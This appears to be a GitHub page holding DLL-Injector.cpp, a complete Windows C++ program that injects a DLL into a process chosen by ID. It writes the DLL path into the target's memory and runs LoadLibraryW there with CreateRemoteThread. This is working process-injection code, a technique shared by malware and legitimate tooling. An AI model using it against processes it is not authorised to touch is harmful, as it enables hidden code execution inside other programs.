-
Notifications
You must be signed in to change notification settings - Fork 4
/
DLL-Injector.cpp
84 lines (67 loc) · 2.87 KB
/
DLL-Injector.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
// DLL Injection using CreateRemoteThread()
#include <Windows.h>
#include <iostream>
#include <WinBase.h>
using namespace std;
int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
AllocConsole();
FILE* consoleOutput;
if (freopen_s(&consoleOutput, "CONOUT$", "w", stdout) != 0) {
MessageBox(NULL, L"Failed to redirect standard output to console window", L"Error", MB_OK | MB_ICONERROR);
return 1;
}
// Opening a target process
wcout << "Hi! Welcome to the DLL Injector!" << endl;
DWORD process_id;
wcout << "Please enter the process ID inside whom you want to inject the target DLL: " << endl;
wcin >> process_id;
wcin.ignore();
LPVOID dll_to_inject;
wchar_t dll_path[] = L"C:\\Users\\user_demo.dll"; //Replace the path of your DLL
dll_to_inject = (LPVOID)dll_path;
HANDLE _OpenProcess = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, FALSE, process_id);
if (_OpenProcess == NULL) {
system("PAUSE");
wcout << "Failed to open process with proper access masks" << endl;
return 1;
}
// Allocating buffer after opening the target process above
void* allocated_memory = VirtualAllocEx(_OpenProcess, NULL, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // This is returning the buffer allocated address
if (!allocated_memory) {
system("PAUSE");
wcout << "The buffer allocation failed" << endl;
CloseHandle(_OpenProcess);
return 1;
}
// Now, need to add the DLL inside the allocated buffer returned by VirtualAllocEx
BOOL _WriteProcessMemory = WriteProcessMemory(_OpenProcess, allocated_memory, dll_to_inject, (::wcslen((const wchar_t*)dll_to_inject) + 1) * sizeof(wchar_t), NULL);
if (!_WriteProcessMemory) {
wcout << "Failed to write process" << endl;
VirtualFreeEx(_OpenProcess, allocated_memory, 0, MEM_RELEASE);
CloseHandle(_OpenProcess);
return 1;
}
// Create the thread inside the target process
DWORD tid;
HANDLE hThread = CreateRemoteThread(_OpenProcess, NULL, 0, (LPTHREAD_START_ROUTINE)::GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW"), allocated_memory, 0, &tid);
if (!hThread) {
wcout << "Failed to create the remote thread" << endl;
VirtualFreeEx(_OpenProcess, allocated_memory, 0, MEM_RELEASE);
CloseHandle(_OpenProcess);
return 1;
}
wcout << "Thread " << tid << " created successfully!" << endl;
if (WAIT_OBJECT_0 == ::WaitForSingleObject(hThread, 5000)) {
wcout << "Thread exited." << endl;
}
else {
wcout << "Thread still hanging around..." << endl;
}
VirtualFreeEx(_OpenProcess, allocated_memory, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(_OpenProcess);
fclose(consoleOutput);
FreeConsole();
return 0;
}